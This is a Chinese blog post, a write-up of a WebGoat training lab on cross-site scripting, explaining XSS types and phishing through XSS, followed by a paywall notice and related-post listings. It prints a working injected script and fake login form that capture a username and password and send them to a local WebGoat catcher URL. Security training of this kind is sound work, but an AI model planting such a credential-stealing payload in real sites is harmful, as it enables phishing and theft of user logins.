WebGoat实验之Cross-Site Scripting(XSS,跨站脚本攻击)- 2016.01.09

最新推荐文章于 2025-05-16 17:56:44 发布
原创 最新推荐文章于 2025-05-16 17:56:44 发布 · 4.9k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#WebGoat实验之Cross-Site #XSS #跨站脚本攻击 #Stroed XSS #Phising XSS

本文详细介绍了WebGoat实验中的不同类型的XSS攻击,包括钓鱼攻击、存储型XSS、反射型XSS,并探讨了如何通过输入验证和输出编码来防止这些攻击。通过实际操作展示了XSS攻击如何窃取用户信息,以及如何利用HTTP Trace进行跨站跟踪攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

        XSS(Cross-Site Scripting)跨站脚本攻击,由于 html 和 js 都是解释执行的,那么如果对用户的输入过滤不够严格或者说不严格处理,那么当用户也输入一些 html 或者 js 的并被浏览器再次加载的时候也是可以被浏览器解释执行的。那么对于一些博客、贴吧等存在用户输入、又存在游客查看评论的地方,做好用户输入的过滤就很有必要。那么 XSS 能干什么呢?不仅可以用来进行钓鱼攻击,还可以用来窃取用户的数据进而静默转移,传送给黑客,想想 html 和 js 能干什么他就能干什么,当然远不止这些,我们还可以注入一些服务器语言,使得服务器端执行的时候也发生未知的结果。

1.1 Phishing With XSS(钓鱼攻击)

如果一个未经验证的用户输入一个 HTTP 响应时, XSS 很有可能发生,利用它就可以进行钓鱼攻击,在一个页面内添加一个伪官方网页就可以骗取用户的账号和口令。注意这里强调的是在 HTTP 响应时攻击,而不是请求,要知道如果是请求的话,那么就相当于是自己黑自己,多没意思,可如果是响应的话就意味着,别人发送请求,而你响应他虚假的页面,这样就可以用来对其进行欺骗。

        首先,我们需要自己写一个页面,用于钓鱼,例如表 1 所示:

<script>

function hack(){

alert("Had this been a real attack... Your credentials were just stolen.UserName="+document.forms[1].user.value+"Password:"+document.forms[1].pass.value);

XSSImage = new Image();

XSSImage.src = "http://localhost/WebGoat/catcher?PROPERTY=yes&user="+document.forms[1].user.value+"&password="+document.forms[1].pass.value;

}</script><form>

<br><br><HR><H3>This feature requires account login :</H3><br><br>

Enter UserName:<br><input type="text" id="user" name="user" /><br>

Enter Password:<br><input type="password" id="pass" name="pass" /><br>

<input type="button" id="login" name="login" value="login" onclick="hack()" />

</form><br><br></HR>
表 1

最低0.47元/天 解锁文章

200万优质内容无限畅学
WebGoat (A7) Cross Site Scripting (XSS)
箭雨镜屋
03-21 3918
第2页 虽然这页好简单,但是强迫症不写就是不爽╮(-)╭ 这页问了个问题:WebGoat范围内多个页面cookie是否一样? 虽然很想直接yes,但还是走一遍流程吧 第1个页面,打开开发者工具(我用的chrome),在Console中输入document.cookie 发现cookie是"JSESSIONID=KDno80WzTKHgbTZZ2SP0-xQmVR7M5m5GTNGHHrBp" 第2个页面,打开开发者工具,在Console中输入alert(document.cookie
pikachu XSS Cross-Site Scripting(皮卡丘漏洞平台通关系列)
热门推荐
箭雨镜屋
03-28 1万+
第一关 反射型xss(get) 1、通关步骤
WebGoat笔记】--- Cross-Site Scripting(XSS)
weixin_33989058的博客
12-21 286
  目标: 伪造一个登陆界面,要求用户输入用户名和密码,将数据提交到http://localhost/WebGoat/capture/PROPERTY=yes&amp;ADD_CREDENTIALS_HERE   解决步骤: 首先:随意输入搜索内容,如:123. 打开源代码,检测是否有未关闭的标签。由于这是一个入门级的练手任务,代码漏洞百出,这一层就不用考虑了。 第二步:...
Cross-Site ScriptingXSS
十步不敢沙人的博客
05-16 1106
本文讲解了xss的基本方式,文章通俗易懂,适合初学者学习理解,主要着重于xss反射性的讲解,并附带靶场实操,理论与实践相结合。
WebGoat系列实验Cross-Site Scripting (XSS)
weixin_30578677的博客
09-18 654
WebGoat系列实验Cross-Site Scripting (XSS) PhishingTitle 本次实验是在一个已知存在XSS漏洞的页面进行钓鱼攻击。通过使用XSS与HTML注入,在页面中注入身份认证html代码,添加javascript脚本收集身份认证信息,并发送到http://localhost:8080/WebGoat/catcher?PROPERTY=yes... 输入以下jav...
Webgoat 笔记总结-Cross-site-scripting
weixin_34348805的博客
10-03 321
Cross-Site Scriptingxss) Phishing with XSS 网络钓鱼与xss 使用<script>alert('xss')</script> 测试 使用<script>function hack(){ alert("Had this been a real attack... Your creden...
webgoat-Cross Site Scripting XSS 跨站脚本攻击
seanyang_的博客
11-28 1810
本节课讲述了什么是XSS,并使用XSS执行那些非开发者本意的任务。
xss跨站脚本.docx
11-23
XSS 跨站脚本攻击防御指南 XSS 跨站脚本攻击是一种常见的 web 应用程序攻击手法,它通常发生在 web 应用程序没有正确地对用户输入进行验证和过滤的情况下。下面我们将详细介绍 XSS 跨站脚本攻击的原理、类型、攻击...
WebGoatV8.1(A7Cross-Site Scripting)详细过关教程
weixin_51566481的博客
08-29 644
WebGoatV8.1
【翻译+题解】WebGoat (A7) Cross Site Scripting (XSS) 跨站脚本
03-15 2309
跨站脚本(通常也称为 XSS)是一种漏洞/缺陷,它允许将 html/脚本标记作为输入,未经编码或消毒就呈现在浏览器中。
WebGoat5.4 Cross-Site Scripting (XSS) 开发版本关卡 通关攻略
weixin_46356548的博客
12-27 4120
本人在学习WebGoat5.4时,发现有些题目需要在开发版本上完成,网上能找到的所谓的通关教程,都说这些题目做不了,经过尝试发现,其实是可以完成的,本篇将对这部分进行重点说明。
WebGoat学习——跨站脚本攻击(CrossSite Scripting (XSS)
weixin_33690963的博客
06-21 631
跨站脚本攻击CrossSite Scripting (XSS)XSS(Cross Site Script)跨站脚本攻击。是指攻击者向被攻击Web 页面里插入恶意html代码,当用户浏览该页之时,嵌入其中的HTML代码会被执行,从而达到攻击的特殊目的。XSS和CSRF(Cross site request forgery)合称Web 杀手组合。黑客洞穿页面逻辑,使输入的内容被...
WebGoat笔记】之四 --- Cross-Site Scripting (XSS)
weixin_30532369的博客
06-21 307
主要内容 保存,反射型Xss,CSRF及HttpOnly的特性 Phishing with XSS LAB: Cross Site Scripting Stage 1: Stored XSS. Stage 2: Block Stored XSS using Input Validation Stage 3: Stored XSS Revisited Stage 4: ...
WebGoat实验-XSS跨站脚本攻击
王二牛放小的博客
05-18 4186
信安实验,安排在WebGoat上面的XSS实验。简单记录一下实验过程。 Stage 1: Stored XSS(存储XSS攻击) 实验内容:主要是用户“Tom”(攻击者)在自己的个人资料中添加了恶意代码(比如最简单的alert('121212');),然后保存。在被攻击者“Jerry”查看Tom的资料的时候,会执行Tom写的恶意代码。 步骤: 首先Tom登录,在自己资料(ViewProfi
Webgoat - xss
hee_mee的博客
07-16 1347
ZeroNil
WebGoat--xss
oh~yeah~
10-22 842
跨站内容比较多,又在反射
webgoat——XSS
weixin_30347009的博客
03-16 454
Stage 1: Stored XSS(存储XSS攻击 黑别人) 实验内容:主要是用户“Tom”(攻击者)在自己的个人资料中添加了恶意代码(比如最简单的<script>alert('121212');</script>),然后保存。在被攻击者“Jerry”查看Tom的资料的时候,会执行Tom写的恶意代码。 步骤: 首先Tom登录,在自己资料(ViewProfile)的...
webgoat Phishing with XSS测试
09-21 599
“钓鱼测试” 目的就是创建一个表单,让受害者填写用户名和密码信息,然后会截取用户信息提交到webgoat上去。主要测试代码分为一下两部分: <form> <br>This feature requires account login:</br> Ente...
XSS跨站脚本攻击的实训报告
最新发布
05-29
好的,用户需要查找关于XSS跨站脚本攻击的实训报告或相关资料,包括示例和下载资源。首先,我需要回顾之前的引用内容,确保提供的信息准确且符合用户需求。首先,用户提到的三个引用中,引用[1]解释了XSS的基本概念...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值